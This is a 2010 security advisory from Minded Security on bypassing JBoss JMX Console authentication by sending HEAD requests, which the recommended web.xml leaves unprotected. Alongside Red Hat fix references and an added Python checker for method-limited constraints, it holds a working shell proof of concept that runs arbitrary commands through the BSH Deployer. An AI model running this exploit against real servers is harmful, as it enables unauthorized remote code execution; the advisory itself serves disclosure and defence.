MSA030409

JMX Console Authentication Bypass via Verb Tampering


Tested Versions:
JMX Console - All Versions

Tested OS:
Linux, Solaris, Windows

Minded Security ReferenceID:
MSA030409

Credits:
Discovered by
Stefano Di Paola of Minded Security
stefano.dipaola [_at_] mindedsecurity.com

Contribution in Exploitation:
Giorgio Fedon of Minded Security
giorgio.fedon [_at_] mindedsecurity.com

Reference:
http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-...

Severity:
High: JMX Console is often exposed to the internet or reachable by abusing
other vulnerabilities. This issue can lead to remote host compromise.

Solution:
A solution to this issue is already available.
See the following RedHat advisories:

https://rhn.redhat.com/errata/RHSA-2010-0376.html
https://rhn.redhat.com/errata/RHSA-2010-0377.html
https://rhn.redhat.com/errata/RHSA-2010-0378.html
https://rhn.redhat.com/errata/RHSA-2010-0379.html

Summary
Minded Security Consultants discovered during a penetration testing activity that JMX Console authentication can be bypassed.
This issue will lead to remote code execution if BSH deployer or other administrative modules are available in the console panel.

Analysis

JMX Console can be secured (protected by password) using the security configuration available in:

jboss/server/default/deploy/jmx-console.war/WEB-INF/web.xml

This is the suggested security configuration, also available in the official JBoss security guidelines ("White Paper on JMX Security"):

https://jira.jboss.org/jira/browse/SECURITY-31


The suggested configuration for protecting the JMX Console is the following one:


<security-constraint>
  <web-resource-collection>
    <web-resource-name>HtmlAdaptor</web-resource-name>
    <description>An example security config that only allows users with
    the role JBossAdmin to access the HTML JMX console web application
    </description>
    <url-pattern>/*</url-pattern>
    <http-method>GET</http-method>
    <http-method>POST</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>JBossAdmin</role-name>
  </auth-constraint>
</security-constraint>


In the configuration above, security restrictions are enabled only for the "GET" and "POST" methods. Any other HTTP method supported by the server will not be restricted.

By issuing a request with the "HEAD" method, it is possible to invoke directly, with "JBossAdmin" privilege, any functionality implemented by the jmx-console without valid credentials. Note: If the JMX Console replies with an HTTP 500 error, the request has been correctly processed.
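
A check for the misconfiguration described above, as an added example that is not part of the original advisory: it parses a web.xml and reports every role-protected web-resource-collection that enumerates HTTP methods, together with the methods left outside the constraint. The function name audit_web_xml, the KNOWN_METHODS list and both sample documents are constructed for illustration; the hardened sample relies on the Servlet specification rule that a collection naming no method covers all methods.

```python
import re
import xml.etree.ElementTree as ET

# Methods a servlet container may dispatch; used to list what a constraint misses.
KNOWN_METHODS = {"GET", "POST", "HEAD", "PUT", "DELETE", "OPTIONS", "TRACE"}

# Constructed sample: the constraint quoted in the advisory.
WEAK = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
</web-app>"""

# Constructed sample: same constraint with the <http-method> elements removed,
# so the constraint applies to every HTTP method.
HARDENED = re.sub(r"\s*<http-method>[A-Z]+</http-method>", "", WEAK)

def local(tag):
    """Strip an XML namespace so namespaced web.xml files are handled too."""
    return tag.rsplit("}", 1)[-1]

def audit_web_xml(xml_text):
    """Return one finding per protected collection that enumerates methods."""
    findings = []
    root = ET.fromstring(xml_text)
    for sc in (e for e in root.iter() if local(e.tag) == "security-constraint"):
        if not any(local(e.tag) == "auth-constraint" for e in sc):
            continue  # no role requirement on this constraint
        for wrc in (e for e in sc if local(e.tag) == "web-resource-collection"):
            listed = {e.text.strip().upper() for e in wrc
                      if local(e.tag) == "http-method" and e.text}
            if listed:  # enumerated methods: everything else is unconstrained
                findings.append({
                    "patterns": [e.text.strip() for e in wrc
                                 if local(e.tag) == "url-pattern" and e.text],
                    "listed": sorted(listed),
                    "unprotected": sorted(KNOWN_METHODS - listed),
                })
    return findings

if __name__ == "__main__":
    for name, doc in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit_web_xml(doc))
```
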

The following proof of concept ("jboss-shell.sh") was written by Minded Security consultants to execute arbitrary commands on the remote host through the "BSH Deployer" component of the JMX Console.
The command output is temporarily redirected to the JBoss server status page for a couple of seconds.

Remote "Jboss-shell.sh" Proof of Concept
Note: The following script should be modified to match your environment configuration.

AA=$1
COM_=`php -r '$arg=$argv[1];for($i=0;$i<strlen($arg);$i++) {printf("%%%02x",ord($arg[$i]));}echo "\n";' 'import java.io.*;
import java.net.*;
String[] s=new String[] {"/bin/sh","-c","'"$AA"'"};
Process p = Runtime.getRuntime().exec(s);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String e=dis.readLine();
String message=e;
while(e!=null){
e= dis.readLine();
message+="|"+e;
}
String mess = message.replaceAll(" ","+").replaceAll("#","%23");
URL u = new URL("http://jbossserver:8080/jmx-console/HtmlAdaptor?ac...;
HttpURLConnection con = (HttpURLConnection) u.openConnection ();
con.setDoInput(true);
con.setRequestProperty("Cookie","MODIFY ME IF NEEDED");
con.setRequestMethod("HEAD");
con.connect();
con.getResponseMessage();
con.disconnect();'`
HOSTPATH="http://jbossserver:8080";
curl -s "$HOSTPATH/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployer%3Aservice%3DBSHDeployer&methodName=createScriptDeployment&argType=java.lang.String&arg0=$COM_&argType=java.lang.String&arg1=soap" -g -X HEAD -H "Cookie:MODIFY ME IF NEEDED" &
sleep 1
curl "$HOSTPATH/status?full=true" -s -g -H "Cookie:MODIFY ME IF NEEDED" | grep 'null|.*|null' -o|perl -i -pe 's/\|/\n/g'

Disclosure Timeline
03/04/2009 Issue found
06/03/2010 Reported to Vendor


Disclaimer

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information.

In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

Any use of this information is at the user's own risk. Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of Minded Security Research Lab. If you wish to reprint the whole or any part of this Alert in any other medium excluding electronic medium, please e-mail research_at_mindedsecurity.com for permission.



Copyright (c) 2010 Minded Security, S.r.l..
All rights reserved worldwide.